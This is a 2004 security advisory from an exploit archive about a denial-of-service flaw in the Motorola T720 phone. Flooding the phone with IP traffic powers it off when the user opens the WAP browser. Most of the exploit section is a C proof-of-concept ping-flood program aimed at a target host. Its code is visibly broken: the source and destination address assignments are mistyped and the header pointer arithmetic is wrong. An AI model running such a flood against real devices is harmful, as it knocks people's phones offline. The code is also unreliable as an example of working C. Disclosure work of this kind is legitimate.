exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

motorolaT720.txt

motorolaT720.txt
Posted Mar 2, 2004
Authored by Shaun Colley | Site nettwerked.co.uk

Motorola T720 Cellular phones have a vulnerability that cause a denial of service when the phone receives an abnormal amount of IP traffic. Upon receiving the traffic, the phone powers-off when the user attempts to access the network.

tags | exploit, denial of service
SHA-256 | 3c3012ee943ab155015cb94a94a705b5b7f6384e9067ab8966ff66d07ec2c944

motorolaT720.txt

Change Mirror Download
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Product: Motorola T720 Cell phones
https://www.motorola.com
Versions: T270
Bug: DoS vulnerability
Impact: Attacker's can reboot the cellphone
remotely.
Date: March 01, 2004
Author: Shaun Colley
Email: shaunige@yahoo.co.uk
WWW: https://www.nettwerked.co.uk

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*



Introduction
#############

"The Motorola T720 proves that the best technological
innovations carefully balance excitement and fun with
convenience and simplicity of use. Improve your
productivity and be one step ahead of the crowd with
digital customization and applications, or just kick
back and have a good time with creative entertainment
and messaging features. Either way, this phone is sure
to deliver a rich, compelling and truly unforgettable
wireless experience." - Vendor's website
(https://www.motorola.com).

The Motorola T720 cell phone is a very nice cell
phone, with plenty of fun features, including WAP
access to the Internet. Unfortunately, there is a
low-risk vulnerability which allows an attacker to
remotely reboot the cell phone easily.



The bug
########

The vulnerability lies within the TCP/IP stack of the
Motorola T720 cell phone. When the phone receives an
abnormal amount of IP traffic, the phone powers-off
when the user attempts to access the network (e.g
through the WAP browser).

The vulnerability can be reproduced in the following
way:

-
1) Connect the phone to the Internet.
2) Flood the device with IP traffic (i.e SYN packets
or ICMP_ECHO requests (ping packets)).
3) Run the WAP browser.
-

At this point, the phone should power-off, and lose
network connectivity.

--
NOTE:

This vulnerability is likely due to a bug in the
phone's IP implementation which bails when a certain
backlog of IP packets is exceeded.
--


The exploit
############

A simple proof-of-concept is demonstrated below:


# motorolakill.c
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <host>\n", argv[0]);
exit(0);
}

int sock;
char packet[5000];
int on = 1;
struct sockaddr_in dest;
struct hostent *host;
struct iphdr *ip = (struct iphdr *) packet;
struct icmphdr *icmp = (struct icmp *) packet
+ sizeof(struct iphdr);
if((host = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve host!\n");
exit(-1);
}

if((sock = socket(AF_INET, SOCK_RAW,
IPPROTO_ICMP)) == -1) {
printf("Couldn't make socket!\n");
printf("You must be root to create a
raw socket.\n");
exit(-1);
}

if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL,
(char *)&on, sizeof(on))) < 0) {
perror("setsockopt");
exit(1);
}

dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr
*)host->h_addr);
ip->ihl = 5;
ip->id = htons(1337);
ip->ttl = 255;
ip->tos = 0;
ip->protocol = IPPROTO_ICMP;
ip->version = 4;
ip->frag_off = 0;
ip->saddr = htons("1.3.3.7");
ip->daddr = inet_ntoa(dest.sin_addr);
ip->tot_len = sizeof(struct iphdr) +
sizeof(struct icmphdr);
ip->check = 0;
icmp->checksum = 0;
icmp->type = ICMP_ECHO;
icmp->code = 0;
printf("Ping flooding %s!\n", argv[1]);

/* begin flooding here. */
while(1) {
sendto(sock, packet, ip->tot_len, 0,
(struct sockaddr *)&dest, sizeof(struct sockaddr));
}
return(0);
}
# EOF motorolakill.c


Use the steps listed above to reproduce the
vulnerability. The above programs shouldn't need long
to cause the phone to poweroff.

(please note the phone will only poweroff if the user
attempts to access the network. If the phone is
sitting idle, it won't be affected. The user must
open the WAP browser during the attack, for example.
This will cause the phone to poweroff quickly.)



The fix
########

No solution exists. Possible workarounds are:

- Connect the phone through a router (possibly via GSM
to allow roaming), filtering out all malicious traffic
to the device.

- Use another system as a gateway system, firewalling
the cellphone, and filtering traffic to the device.



Vendor Status
##############

I have contacted the vendor regarding this low-risk
vulnerability. I shall update this if I get a
response, depending on whether Motorola verify issue
to be serious enough, or even an issue at all.





Thank you for your time.
Shaun.






___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping"
your friends today! Download Messenger Now
https://uk.messenger.yahoo.com/download/index.html
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close